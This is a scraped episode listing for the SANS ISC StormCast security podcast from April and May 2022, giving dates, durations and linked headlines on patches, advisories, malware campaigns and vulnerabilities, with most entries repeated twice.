From 0-Day to Mirai: 7 days of BIG-IP Exploits https://isc.sans.edu/forums/diary/From+0Day+to+Mirai+7+days+of+BIGIP+Exploits/28644/ Sonicwall Vulnerabilities Patched https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0009 Zonealarm Patch https://www.zonealarm.com/software/extreme-security/release-history Taking over npm account https://thehackerblog.com/zero-days-without-incident-compromising-angular-via-expired-npm-publisher-email-domains-7kZplW4x/
5/16/20226 minutes, 26 seconds
Episode Artwork

ISC StormCast for Friday, May 13th, 2022

When Get-WebRequest Fails You https://isc.sans.edu/forums/diary/When+GetWebRequest+Fails+You/28640/ HP PC BIOS Security Updates https://support.hp.com/us-en/document/ish_6184733-6184761-16/hpsbhf03788 INTEL BIOS Advisory https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00601.html Zyxel RCE Vulnerability https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/
5/13/20224 minutes, 58 seconds
Episode Artwork

ISC StormCast for Friday, May 13th, 2022

When Get-WebRequest Fails You https://isc.sans.edu/forums/diary/When+GetWebRequest+Fails+You/28640/ HP PC BIOS Security Updates https://support.hp.com/us-en/document/ish_6184733-6184761-16/hpsbhf03788 INTEL BIOS Advisory https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00601.html Zyxel RCE Vulnerability https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/
5/13/20224 minutes, 58 seconds
Episode Artwork

ISC StormCast for Thursday, May 12th, 2022

TA578 Using Thread-Hijacked Emails to Push ISO Files for Bumblebee Malware https://isc.sans.edu/forums/diary/TA578+using+threadhijacked+emails+to+push+ISO+files+for+Bumblebee+malware/28636/ Google Drive Emerges as Top App for Malware Downloads https://www.helpnetsecurity.com/2022/05/11/malicious-pdf-search-engines/ Vanity URL Abuse https://www.varonis.com/blog/url-spoofing npm Supply Chain Attack Turns Out to be Part of Penetration Test https://jfrog.com/blog/npm-supply-chain-attack-targets-german-based-companies/
5/12/20225 minutes, 33 seconds
Episode Artwork

ISC StormCast for Thursday, May 12th, 2022

TA578 Using Thread-Hijacked Emails to Push ISO Files for Bumblebee Malware https://isc.sans.edu/forums/diary/TA578+using+threadhijacked+emails+to+push+ISO+files+for+Bumblebee+malware/28636/ Google Drive Emerges as Top App for Malware Downloads https://www.helpnetsecurity.com/2022/05/11/malicious-pdf-search-engines/ Vanity URL Abuse https://www.varonis.com/blog/url-spoofing npm Supply Chain Attack Turns Out to be Part of Penetration Test https://jfrog.com/blog/npm-supply-chain-attack-targets-german-based-companies/
5/12/20225 minutes, 33 seconds
Episode Artwork

ISC StormCast for Wednesday, May 11th, 2022

Microsoft May 2022 Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+May+2022+Patch+Tuesday/28632/ Adobe Updates https://helpx.adobe.com/security/security-bulletin.html npm "foreach" package domain takeover https://www.theregister.com/2022/05/10/security_npm_email/
5/11/20225 minutes, 32 seconds
Episode Artwork

ISC StormCast for Wednesday, May 11th, 2022

Microsoft May 2022 Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+May+2022+Patch+Tuesday/28632/ Adobe Updates https://helpx.adobe.com/security/security-bulletin.html npm "foreach" package domain takeover https://www.theregister.com/2022/05/10/security_npm_email/
5/11/20225 minutes, 32 seconds
Episode Artwork

ISC StormCast for Tuesday, May 10th, 2022

Octopus Backdoor is Back with a New Embedded Obfuscated Bat File https://isc.sans.edu/forums/diary/Octopus+Backdoor+is+Back+with+a+New+Embedded+Obfuscated+Bat+File/28628/#comments CVE-2022-1388 (BIG-IP) Exploits https://twitter.com/sans_isc/status/1523741896707043328 https://github.com/horizon3ai/CVE-2022-1388 Trend Micro False Positive Aftermath https://success.trendmicro.com/dcx/s/solution/000290966?language=en_US Microsoft Azure https://orca.security/resources/blog/azure-synapse-analytics-security-advisory/ https://msrc-blog.microsoft.com/2022/05/09/vulnerability-mitigated-in-the-third-party-data-connector-used-in-azure-synapse-pipelines-and-azure-data-factory-cve-2022-29972/
5/10/20225 minutes, 51 seconds
Episode Artwork

ISC StormCast for Tuesday, May 10th, 2022

Octopus Backdoor is Back with a New Embedded Obfuscated Bat File https://isc.sans.edu/forums/diary/Octopus+Backdoor+is+Back+with+a+New+Embedded+Obfuscated+Bat+File/28628/#comments CVE-2022-1388 (BIG-IP) Exploits https://twitter.com/sans_isc/status/1523741896707043328 https://github.com/horizon3ai/CVE-2022-1388 Trend Micro False Positive Aftermath https://success.trendmicro.com/dcx/s/solution/000290966?language=en_US Microsoft Azure https://orca.security/resources/blog/azure-synapse-analytics-security-advisory/ https://msrc-blog.microsoft.com/2022/05/09/vulnerability-mitigated-in-the-third-party-data-connector-used-in-azure-synapse-pipelines-and-azure-data-factory-cve-2022-29972/
5/10/20225 minutes, 51 seconds
Episode Artwork

ISC StormCast for Monday, May 9th, 2022

F5 BIG-IP Unauthenticated RCE Vulnerability (CVE-2022-1388) https://isc.sans.edu/forums/diary/F5+BIGIP+Unauthenticated+RCE+Vulnerability+CVE20221388/28624/ QNAP QVR Update https://www.qnap.com/de-de/security-advisory/qsa-22-07 Raspberry Robin Worm https://redcanary.com/blog/raspberry-robin/ rubygems CVE-2022-29176 explained https://greg.molnar.io/blog/rubygems-cve-2022-29176/ What is the simples malware in the world? https://isc.sans.edu/forums/diary/What+is+the+simplest+malware+in+the+world/28620/
5/9/20225 minutes, 53 seconds
Episode Artwork

ISC StormCast for Monday, May 9th, 2022

F5 BIG-IP Unauthenticated RCE Vulnerability (CVE-2022-1388) https://isc.sans.edu/forums/diary/F5+BIGIP+Unauthenticated+RCE+Vulnerability+CVE20221388/28624/ QNAP QVR Update https://www.qnap.com/de-de/security-advisory/qsa-22-07 Raspberry Robin Worm https://redcanary.com/blog/raspberry-robin/ rubygems CVE-2022-29176 explained https://greg.molnar.io/blog/rubygems-cve-2022-29176/ What is the simples malware in the world? https://isc.sans.edu/forums/diary/What+is+the+simplest+malware+in+the+world/28620/
5/9/20225 minutes, 53 seconds
Episode Artwork

ISC StormCast for Friday, May 6th, 2022

Password-protected Excel Spreadsheet Pushes Remcos RAT https://isc.sans.edu/forums/diary/Passwordprotected+Excel+spreadsheet+pushes+Remcos+RAT/28616/ Microsoft, Apple, Google Accelated FIDO Standard Implementation https://www.theregister.com/2022/05/05/microsoft-apple-google-fido/ Heroku Admits Breach https://status.heroku.com/incidents/2413
5/6/20225 minutes, 36 seconds
Episode Artwork

ISC StormCast for Friday, May 6th, 2022

Password-protected Excel Spreadsheet Pushes Remcos RAT https://isc.sans.edu/forums/diary/Passwordprotected+Excel+spreadsheet+pushes+Remcos+RAT/28616/ Microsoft, Apple, Google Accelated FIDO Standard Implementation https://www.theregister.com/2022/05/05/microsoft-apple-google-fido/ Heroku Admits Breach https://status.heroku.com/incidents/2413
5/6/20225 minutes, 36 seconds
Episode Artwork

ISC StormCast for Thursday, May 5th, 2022

Finding the Real "Last Patched" Day (Interim Version) https://isc.sans.edu/forums/diary/Finding+the+Real+Last+Patched+Day+Interim+Version/28610/ Fake Windows Updates Install Ransomware https://www.bleepingcomputer.com/news/security/fake-windows-10-updates-infect-you-with-magniber-ransomware/ Vulnerablities in Ransomware https://www.malvuln.com Heroku Forces Password Reset https://status.heroku.com/incidents/2413 Cisco Patches Enterprise NFV Infrastructure Software https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-NFVIS-MUL-7DySRX9 Big-IP iControl REST Vulnerability https://support.f5.com/csp/article/K23605346
5/5/20225 minutes, 54 seconds
Episode Artwork

ISC StormCast for Thursday, May 5th, 2022

Finding the Real "Last Patched" Day (Interim Version) https://isc.sans.edu/forums/diary/Finding+the+Real+Last+Patched+Day+Interim+Version/28610/ Fake Windows Updates Install Ransomware https://www.bleepingcomputer.com/news/security/fake-windows-10-updates-infect-you-with-magniber-ransomware/ Vulnerablities in Ransomware https://www.malvuln.com Heroku Forces Password Reset https://status.heroku.com/incidents/2413 Cisco Patches Enterprise NFV Infrastructure Software https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-NFVIS-MUL-7DySRX9 Big-IP iControl REST Vulnerability https://support.f5.com/csp/article/K23605346
5/5/20225 minutes, 54 seconds
Episode Artwork

ISC StormCast for Wednesday, May 4th, 2022

Some Honeypot Updates https://isc.sans.edu/forums/diary/Some+Honeypot+Updates/28608/ TLStorm 2 - NanoSSL TLS Library Misuse https://www.armis.com/blog/tlstorm-2-nanossl-tls-library-misuse-leads-to-vulnerabilities-in-common-switches/ Unpatched DNS Bug in uClibc and uClibc-ng Library https://www.nozominetworks.com/blog/nozomi-networks-discovers-unpatched-DNS-bug-in-popular-c-standard-library-putting-iot-at-risk/ Abusing Security Software to Sideload PlugX and ShadowPad https://www.sentinelone.com/labs/moshen-dragons-triad-and-error-approach-abusing-security-software-to-sideload-plugx-and-shadowpad/ Microsoft Edge Update Triggers Trend Micro AV https://success.trendmicro.com/forum/s/question/0D54T00001QDqzgSAD/we-are-getting-this-message-from-every-client-since-several-minutesis-it-a-false-positiv-error-or-do-we-have-a-real-trojaner-problem-
5/4/20226 minutes, 9 seconds
Episode Artwork

ISC StormCast for Wednesday, May 4th, 2022

Some Honeypot Updates https://isc.sans.edu/forums/diary/Some+Honeypot+Updates/28608/ TLStorm 2 - NanoSSL TLS Library Misuse https://www.armis.com/blog/tlstorm-2-nanossl-tls-library-misuse-leads-to-vulnerabilities-in-common-switches/ Unpatched DNS Bug in uClibc and uClibc-ng Library https://www.nozominetworks.com/blog/nozomi-networks-discovers-unpatched-DNS-bug-in-popular-c-standard-library-putting-iot-at-risk/ Abusing Security Software to Sideload PlugX and ShadowPad https://www.sentinelone.com/labs/moshen-dragons-triad-and-error-approach-abusing-security-software-to-sideload-plugx-and-shadowpad/ Microsoft Edge Update Triggers Trend Micro AV https://success.trendmicro.com/forum/s/question/0D54T00001QDqzgSAD/we-are-getting-this-message-from-every-client-since-several-minutesis-it-a-false-positiv-error-or-do-we-have-a-real-trojaner-problem-
5/4/20226 minutes, 9 seconds
Episode Artwork

ISC StormCast for Tuesday, May 3rd, 2022

Detecting VSTO Office Files with ExifTool https://isc.sans.edu/forums/diary/Detecting+VSTO+Office+Files+With+ExifTool/28604/ The Gmail SMTP Relay Service Exploit https://www.avanan.com/blog/the-gmail-smtp-relay-service-exploit OpenSSF Package Analysis https://openssf.org/blog/2022/04/28/introducing-package-analysis-scanning-open-source-packages-for-malicious-behavior/ M1 Prefetcher Data Leak https://www.prefetchers.info
5/3/20225 minutes, 45 seconds
Episode Artwork

ISC StormCast for Tuesday, May 3rd, 2022

Detecting VSTO Office Files with ExifTool https://isc.sans.edu/forums/diary/Detecting+VSTO+Office+Files+With+ExifTool/28604/ The Gmail SMTP Relay Service Exploit https://www.avanan.com/blog/the-gmail-smtp-relay-service-exploit OpenSSF Package Analysis https://openssf.org/blog/2022/04/28/introducing-package-analysis-scanning-open-source-packages-for-malicious-behavior/ M1 Prefetcher Data Leak https://www.prefetchers.info
5/3/20225 minutes, 45 seconds
Episode Artwork

ISC StormCast for Monday, May 2nd, 2022

Using Passive DNS Sources for Reconnaissance and Enumeration https://isc.sans.edu/forums/diary/Using+Passive+DNS+sources+for+Reconnaissance+and+Enumeration/28596/ Microsoft Edge Secure Network https://support.microsoft.com/en-gb/topic/use-the-microsoft-edge-secure-network-to-protect-your-browsing-885472e2-7847-4d89-befb-c80d3dda6318 Sina Weibo Making Users IPs and Location Public https://www.theregister.com/2022/04/29/weibo_location_services_default/ https://weibo.com/u/1934183965?layerid=4763194269108760 SonicWall Global VPN Client DLL Search Order Hijacking https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0036 Zoom Updated https://explore.zoom.us/en/trust/security/security-bulletin/
5/2/20224 minutes, 48 seconds
Episode Artwork

ISC StormCast for Monday, May 2nd, 2022

Using Passive DNS Sources for Reconnaissance and Enumeration https://isc.sans.edu/forums/diary/Using+Passive+DNS+sources+for+Reconnaissance+and+Enumeration/28596/ Microsoft Edge Secure Network https://support.microsoft.com/en-gb/topic/use-the-microsoft-edge-secure-network-to-protect-your-browsing-885472e2-7847-4d89-befb-c80d3dda6318 Sina Weibo Making Users IPs and Location Public https://www.theregister.com/2022/04/29/weibo_location_services_default/ https://weibo.com/u/1934183965?layerid=4763194269108760 SonicWall Global VPN Client DLL Search Order Hijacking https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0036 Zoom Updated https://explore.zoom.us/en/trust/security/security-bulletin/
5/2/20224 minutes, 48 seconds
Episode Artwork

ISC StormCast for Friday, April 29th, 2022

A Day of SMB: What does our SMB/RPC Honeypot see? CVE-2022-26809 https://isc.sans.edu/forums/diary/A+Day+of+SMB+What+does+our+SMBRPC+Honeypot+see+CVE202226809/28594/ Azure PostgreSQL Privilege Escalation https://www.wiz.io/blog/wiz-research-discovers-extrareplica-cross-account-database-vulnerability-in-azure-postgresql/ Security alert: Attack campaign involving stolen OAuth user tokens https://github.blog/2022-04-15-security-alert-stolen-oauth-user-tokens Netatalk Vulnerability Affecting Synology, QNAP, Others? https://www.synology.com/en-global/security/advisory/Synology_SA_22_06
4/29/20226 minutes, 18 seconds
Episode Artwork

ISC StormCast for Friday, April 29th, 2022

A Day of SMB: What does our SMB/RPC Honeypot see? CVE-2022-26809 https://isc.sans.edu/forums/diary/A+Day+of+SMB+What+does+our+SMBRPC+Honeypot+see+CVE202226809/28594/ Azure PostgreSQL Privilege Escalation https://www.wiz.io/blog/wiz-research-discovers-extrareplica-cross-account-database-vulnerability-in-azure-postgresql/ Security alert: Attack campaign involving stolen OAuth user tokens https://github.blog/2022-04-15-security-alert-stolen-oauth-user-tokens Netatalk Vulnerability Affecting Synology, QNAP, Others? https://www.synology.com/en-global/security/advisory/Synology_SA_22_06
4/29/20226 minutes, 18 seconds
Episode Artwork

ISC StormCast for Thursday, April 28th, 2022

MITRE ATT&CK v11 https://isc.sans.edu/forums/diary/MITRE+ATTCK+v11+a+small+update+that+can+help+not+just+with+detection+engineering/28590/ Microsoft Special Report: Ukraine https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd Linux Privilege Escalation Nimbuspwn https://www.microsoft.com/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/ npm Package Planting https://blog.aquasec.com/npm-package-planting
4/28/20226 minutes, 7 seconds
Episode Artwork

ISC StormCast for Thursday, April 28th, 2022

MITRE ATT&CK v11 https://isc.sans.edu/forums/diary/MITRE+ATTCK+v11+a+small+update+that+can+help+not+just+with+detection+engineering/28590/ Microsoft Special Report: Ukraine https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd Linux Privilege Escalation Nimbuspwn https://www.microsoft.com/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/ npm Package Planting https://blog.aquasec.com/npm-package-planting
4/28/20226 minutes, 7 seconds
Episode Artwork

ISC StormCast for Wednesday, April 27th, 2022

WSO2 Vuln Exploited to Install Crypto Coin Miners https://isc.sans.edu/forums/diary/WSO2+RCE+exploited+in+the+wild/28586/ Core Impact Backdoor Delivered Via VMware Vulnerablity https://blog.morphisec.com/vmware-identity-manager-attack-backdoor VirusTotal Exploit Update https://twitter.com/bquintero/status/1518738072820670464 Emotet Experimenting With New Delivery Techniques https://www.proofpoint.com/us/blog/threat-insight/emotet-tests-new-delivery-techniques
4/27/20226 minutes, 22 seconds
Episode Artwork

ISC StormCast for Wednesday, April 27th, 2022

WSO2 Vuln Exploited to Install Crypto Coin Miners https://isc.sans.edu/forums/diary/WSO2+RCE+exploited+in+the+wild/28586/ Core Impact Backdoor Delivered Via VMware Vulnerablity https://blog.morphisec.com/vmware-identity-manager-attack-backdoor VirusTotal Exploit Update https://twitter.com/bquintero/status/1518738072820670464 Emotet Experimenting With New Delivery Techniques https://www.proofpoint.com/us/blog/threat-insight/emotet-tests-new-delivery-techniques
4/27/20226 minutes, 22 seconds
Episode Artwork

ISC StormCast for Tuesday, April 26th, 2022

Simple PDF Linking to Malicious Content https://isc.sans.edu/forums/diary/Simple+PDF+Linking+to+Malicious+Content/28582/ VirusTotal Remote Code Execution https://www.cysrc.com/blog/virus-total-blog Apple's Private Relay can Cause the System to Ignore Firewall Rules https://mullvad.net/en/blog/2022/4/25/apples-private-relay-can-cause-the-system-to-ignore-firewall-rules/ Emotet Breaks and Later Fixes Installer https://www.bleepingcomputer.com/news/security/emotet-malware-infects-users-again-after-fixing-broken-installer/
4/26/20225 minutes, 59 seconds
Episode Artwork

ISC StormCast for Tuesday, April 26th, 2022

Simple PDF Linking to Malicious Content https://isc.sans.edu/forums/diary/Simple+PDF+Linking+to+Malicious+Content/28582/ VirusTotal Remote Code Execution https://www.cysrc.com/blog/virus-total-blog Apple's Private Relay can Cause the System to Ignore Firewall Rules https://mullvad.net/en/blog/2022/4/25/apples-private-relay-can-cause-the-system-to-ignore-firewall-rules/ Emotet Breaks and Later Fixes Installer https://www.bleepingcomputer.com/news/security/emotet-malware-infects-users-again-after-fixing-broken-installer/
4/26/20225 minutes, 59 seconds
Episode Artwork

ISC StormCast for Monday, April 25th, 2022

Analyzing Word Phishing Document https://isc.sans.edu/forums/diary/Analyzing+a+Phishing+Word+Document/28562/ Targeting Roku Streaming Devices https://isc.sans.edu/forums/diary/Are+Roku+Streaming+Devices+Safe+from+Exploitation/28578/ JWT Null Signature Vulnerability PoC https://github.com/DataDog/security-labs-pocs/tree/main/proof-of-concept-exploits/jwt-null-signature-vulnerable-app Expat XML Vulnerabilities https://www.ibm.com/support/pages/node/6573293 Jira Vulnerability https://confluence.atlassian.com/jira/jira-security-advisory-2022-04-20-1115127899.html
4/25/20225 minutes
Episode Artwork

ISC StormCast for Monday, April 25th, 2022

Analyzing Word Phishing Document https://isc.sans.edu/forums/diary/Analyzing+a+Phishing+Word+Document/28562/ Targeting Roku Streaming Devices https://isc.sans.edu/forums/diary/Are+Roku+Streaming+Devices+Safe+from+Exploitation/28578/ JWT Null Signature Vulnerability PoC https://github.com/DataDog/security-labs-pocs/tree/main/proof-of-concept-exploits/jwt-null-signature-vulnerable-app Expat XML Vulnerabilities https://www.ibm.com/support/pages/node/6573293 Jira Vulnerability https://confluence.atlassian.com/jira/jira-security-advisory-2022-04-20-1115127899.html
4/25/20225 minutes
Episode Artwork

ISC StormCast for Friday, April 22nd, 2022

Multi Cryptocurrency Clipboard Swapper https://isc.sans.edu/forums/diary/MultiCryptocurrency+Clipboard+Swapper/28574/ Amazong Fixes AWS log4j Fix https://aws.amazon.com/security/security-bulletins/AWS-2022-006/ Cisco Fixes https://tools.cisco.com/security/center/publicationListing.x Psychic Signature PoC https://github.com/khalednassar/CVE-2022-21449-TLS-PoC ALAC Audio Decoder Bug https://blog.checkpoint.com/2022/04/21/largest-mobile-chipset-manufacturers-used-vulnerable-audio-decoder-2-3-of-android-users-privacy-around-the-world-were-at-risk/
4/22/20226 minutes, 26 seconds
Episode Artwork

ISC StormCast for Friday, April 22nd, 2022

Multi Cryptocurrency Clipboard Swapper https://isc.sans.edu/forums/diary/MultiCryptocurrency+Clipboard+Swapper/28574/ Amazong Fixes AWS log4j Fix https://aws.amazon.com/security/security-bulletins/AWS-2022-006/ Cisco Fixes https://tools.cisco.com/security/center/publicationListing.x Psychic Signature PoC https://github.com/khalednassar/CVE-2022-21449-TLS-PoC ALAC Audio Decoder Bug https://blog.checkpoint.com/2022/04/21/largest-mobile-chipset-manufacturers-used-vulnerable-audio-decoder-2-3-of-android-users-privacy-around-the-world-were-at-risk/
4/22/20226 minutes, 26 seconds
Episode Artwork

ISC StormCast for Thursday, April 21st, 2022

AA Distribution Quakbot (Qbot) infection siwth DarkVNC https://isc.sans.edu/forums/diary/aa+distribution+Qakbot+Qbot+infection+with+DarkVNC+traffic/28568/ Java Psychic Signatures https://neilmadden.blog/2022/04/19/psychic-signatures-in-java/ Snort DoS Vulnerability https://claroty.com/2022/04/14/blog-research-blinding-snort-breaking-the-modbus-ot-preprocessor/
4/21/20225 minutes, 45 seconds
Episode Artwork

ISC StormCast for Thursday, April 21st, 2022

AA Distribution Quakbot (Qbot) infection siwth DarkVNC https://isc.sans.edu/forums/diary/aa+distribution+Qakbot+Qbot+infection+with+DarkVNC+traffic/28568/ Java Psychic Signatures https://neilmadden.blog/2022/04/19/psychic-signatures-in-java/ Snort DoS Vulnerability https://claroty.com/2022/04/14/blog-research-blinding-snort-breaking-the-modbus-ot-preprocessor/
4/21/20225 minutes, 45 seconds
Episode Artwork

ISC StormCast for Wednesday, April 20th, 2022

u-boot Password Reset https://isc.sans.edu/forums/diary/Resetting+Linux+Passwords+with+UBoot+Bootloaders/28564/ Oracle CPU https://www.oracle.com/security-alerts/cpuapr2022.html MetaMask iCloud Phishing https://www.bleepingcomputer.com/news/security/hackers-steal-655k-after-picking-metamask-seed-from-icloud-backup/ SMB1 Gone From Windows 11 Home https://techcommunity.microsoft.com/t5/storage-at-microsoft/smb1-now-disabled-by-default-for-windows-11-home-insiders-builds/ba-p/3289473 Lenovo UEFI/BIOS Vulnerability https://support.lenovo.com/us/en/product_security/ps500483-lenovo-system-update-privilege-escalation-vulnerability https://support.lenovo.com/de/de/product_security/LEN-84943
4/20/20226 minutes, 15 seconds
Episode Artwork

ISC StormCast for Wednesday, April 20th, 2022

u-boot Password Reset https://isc.sans.edu/forums/diary/Resetting+Linux+Passwords+with+UBoot+Bootloaders/28564/ Oracle CPU https://www.oracle.com/security-alerts/cpuapr2022.html MetaMask iCloud Phishing https://www.bleepingcomputer.com/news/security/hackers-steal-655k-after-picking-metamask-seed-from-icloud-backup/ SMB1 Gone From Windows 11 Home https://techcommunity.microsoft.com/t5/storage-at-microsoft/smb1-now-disabled-by-default-for-windows-11-home-insiders-builds/ba-p/3289473 Lenovo UEFI/BIOS Vulnerability https://support.lenovo.com/us/en/product_security/ps500483-lenovo-system-update-privilege-escalation-vulnerability https://support.lenovo.com/de/de/product_security/LEN-84943
4/20/20226 minutes, 15 seconds
Episode Artwork

ISC StormCast for Tuesday, April 19th, 2022

Sysmon's ReigstryEvent (Value Set) and Binary Data https://isc.sans.edu/forums/diary/Sysmons+RegistryEvent+Value+Set/28558/ Ukraine CERT Posts: IcedID and Zimbra Flaw https://cert.gov.ua/article/39606 https://cert.gov.ua/article/39609 New NSO Pegasus Exploit Spotted in the Wild https://citizenlab.ca/2022/04/catalangate-extensive-mercenary-spyware-operation-against-catalans-using-pegasus-candiru/ Unofficial Windows 11 Upgrade Delivers Spyware https://www.bleepingcomputer.com/news/security/unofficial-windows-11-upgrade-installs-info-stealing-malware/
4/19/20224 minutes, 56 seconds
Episode Artwork

ISC StormCast for Tuesday, April 19th, 2022

Sysmon's ReigstryEvent (Value Set) and Binary Data https://isc.sans.edu/forums/diary/Sysmons+RegistryEvent+Value+Set/28558/ Ukraine CERT Posts: IcedID and Zimbra Flaw https://cert.gov.ua/article/39606 https://cert.gov.ua/article/39609 New NSO Pegasus Exploit Spotted in the Wild https://citizenlab.ca/2022/04/catalangate-extensive-mercenary-spyware-operation-against-catalans-using-pegasus-candiru/ Unofficial Windows 11 Upgrade Delivers Spyware https://www.bleepingcomputer.com/news/security/unofficial-windows-11-upgrade-installs-info-stealing-malware/
4/19/20224 minutes, 56 seconds
Episode Artwork

ISC StormCast for Monday, April 18th, 2022

Office Now Protects You From Malicious ISO Files https://isc.sans.edu/forums/diary/Office+Protects+You+From+Malicious+ISO+Files/28554/ Github Stolen OAUTH User Tokens https://github.blog/2022-04-15-security-alert-stolen-oauth-user-tokens/ Git For Windows Vulnerability https://nvd.nist.gov/vuln/detail/CVE-2022-24765 Cisco Wireless Controller Bug https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-wlc-auth-bypass-JRNhV4fF
4/18/20225 minutes, 36 seconds
Episode Artwork

ISC StormCast for Monday, April 18th, 2022

Office Now Protects You From Malicious ISO Files https://isc.sans.edu/forums/diary/Office+Protects+You+From+Malicious+ISO+Files/28554/ Github Stolen OAUTH User Tokens https://github.blog/2022-04-15-security-alert-stolen-oauth-user-tokens/ Git For Windows Vulnerability https://nvd.nist.gov/vuln/detail/CVE-2022-24765 Cisco Wireless Controller Bug https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-wlc-auth-bypass-JRNhV4fF
4/18/20225 minutes, 36 seconds
Episode Artwork

ISC StormCast for Friday, April 15th, 2022

An Update on CVE-2022-26809 MSRPC Vulnerability - PATCH NOW https://isc.sans.edu/forums/diary/An+Update+on+CVE202226809+MSRPC+Vulnerabliity+PATCH+NOW/28550/ Webcast: https://www.sans.org/webcasts/cve-2022-26809-ms-rpc-vulnerability-analysis/ https://twitter.com/splinter_code/status/1514653941304369153 Google Chrome 0-Day Patch https://chromereleases.googleblog.com/2022/04/stable-channel-update-for-desktop_14.html Cisco Webex Phones Home Audio Telemetry https://wiscprivacy.com/papers/vca_mute.pdf Grafana Enterprise Vulnerabilty https://grafana.com/blog/2022/04/12/grafana-enterprise-8.4.6-released-with-high-severity-security-fix/
4/15/20225 minutes, 28 seconds
Episode Artwork

ISC StormCast for Friday, April 15th, 2022

An Update on CVE-2022-26809 MSRPC Vulnerability - PATCH NOW https://isc.sans.edu/forums/diary/An+Update+on+CVE202226809+MSRPC+Vulnerabliity+PATCH+NOW/28550/ Webcast: https://www.sans.org/webcasts/cve-2022-26809-ms-rpc-vulnerability-analysis/ https://twitter.com/splinter_code/status/1514653941304369153 Google Chrome 0-Day Patch https://chromereleases.googleblog.com/2022/04/stable-channel-update-for-desktop_14.html Cisco Webex Phones Home Audio Telemetry https://wiscprivacy.com/papers/vca_mute.pdf Grafana Enterprise Vulnerabilty https://grafana.com/blog/2022/04/12/grafana-enterprise-8.4.6-released-with-high-severity-security-fix/
4/15/20225 minutes, 28 seconds
Episode Artwork

ISC StormCast for Thursday, April 14th, 2022

How is Ukrainian Internet Holding Up During Russian Invasion https://isc.sans.edu/forums/diary/How+is+Ukrainian+internet+holding+up+during+the+Russian+invasion/28546/ Update on Windows Patches and CVE-2022-26809 https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26809 Adobe Updates https://helpx.adobe.com/security/products/photoshop/apsb22-20.html Apache Struts 2 Update https://cwiki.apache.org/confluence/display/WW/S2-062
4/14/20225 minutes, 52 seconds
Episode Artwork

ISC StormCast for Thursday, April 14th, 2022

How is Ukrainian Internet Holding Up During Russian Invasion https://isc.sans.edu/forums/diary/How+is+Ukrainian+internet+holding+up+during+the+Russian+invasion/28546/ Update on Windows Patches and CVE-2022-26809 https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26809 Adobe Updates https://helpx.adobe.com/security/products/photoshop/apsb22-20.html Apache Struts 2 Update https://cwiki.apache.org/confluence/display/WW/S2-062
4/14/20225 minutes, 52 seconds
Episode Artwork

ISC StormCast for Wednesday, April 13th, 2022

Microsoft April 2022 Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+April+2022+Patch+Tuesday/28542/ NGINX Statement To LDAP Weakness https://www.nginx.com/blog/addressing-security-weaknesses-nginx-ldap-reference-implementation/ Attacks on Ukrainian Power Grid https://www.welivesecurity.com/2022/04/12/industroyer2-industroyer-reloaded/
4/13/20226 minutes, 45 seconds
Episode Artwork

ISC StormCast for Wednesday, April 13th, 2022

Microsoft April 2022 Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+April+2022+Patch+Tuesday/28542/ NGINX Statement To LDAP Weakness https://www.nginx.com/blog/addressing-security-weaknesses-nginx-ldap-reference-implementation/ Attacks on Ukrainian Power Grid https://www.welivesecurity.com/2022/04/12/industroyer2-industroyer-reloaded/
4/13/20226 minutes, 45 seconds
Episode Artwork

ISC StormCast for Tuesday, April 12th, 2022

Spring: It isn't just about Spring4Shell. https://isc.sans.edu/forums/diary/Spring+It+isnt+just+about+Spring4Shell+Spring+Cloud+Function+Vulnerabilities+are+being+probed+too/28538/ Microsoft Windows Autopatch https://techcommunity.microsoft.com/t5/windows-it-pro-blog/get-current-and-stay-current-with-windows-autopatch/ba-p/3271839 More npm protestware https://github.com/Yaffle/EventSource/commit/de137927e13d8afac153d2485152ccec48948a7a Raspberry Pi Update https://www.raspberrypi.com/news/raspberry-pi-bullseye-update-april-2022/
4/12/20225 minutes, 59 seconds
Episode Artwork

ISC StormCast for Tuesday, April 12th, 2022

Spring: It isn't just about Spring4Shell. https://isc.sans.edu/forums/diary/Spring+It+isnt+just+about+Spring4Shell+Spring+Cloud+Function+Vulnerabilities+are+being+probed+too/28538/ Microsoft Windows Autopatch https://techcommunity.microsoft.com/t5/windows-it-pro-blog/get-current-and-stay-current-with-windows-autopatch/ba-p/3271839 More npm protestware https://github.com/Yaffle/EventSource/commit/de137927e13d8afac153d2485152ccec48948a7a Raspberry Pi Update https://www.raspberrypi.com/news/raspberry-pi-bullseye-update-april-2022/
4/12/20225 minutes, 59 seconds
Episode Artwork

ISC StormCast for Monday, April 11th, 2022

Misc Spring4Shell Items https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-java-spring-rce-Zx9GUc67 https://www.trendmicro.com/en_us/research/22/d/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulner.html https://github.com/AgainstTheWest/NginxDay Russian Certificate Authority Update https://koen.engineer/russias-certificate-authority-for-sanctioned-organizations-645d61af8ac6 Conti Source Code Leak Leads to Copycats https://www.bleepingcomputer.com/news/security/hackers-use-contis-leaked-ransomware-to-attack-russian-companies/
4/11/20226 minutes, 15 seconds
Episode Artwork

ISC StormCast for Monday, April 11th, 2022

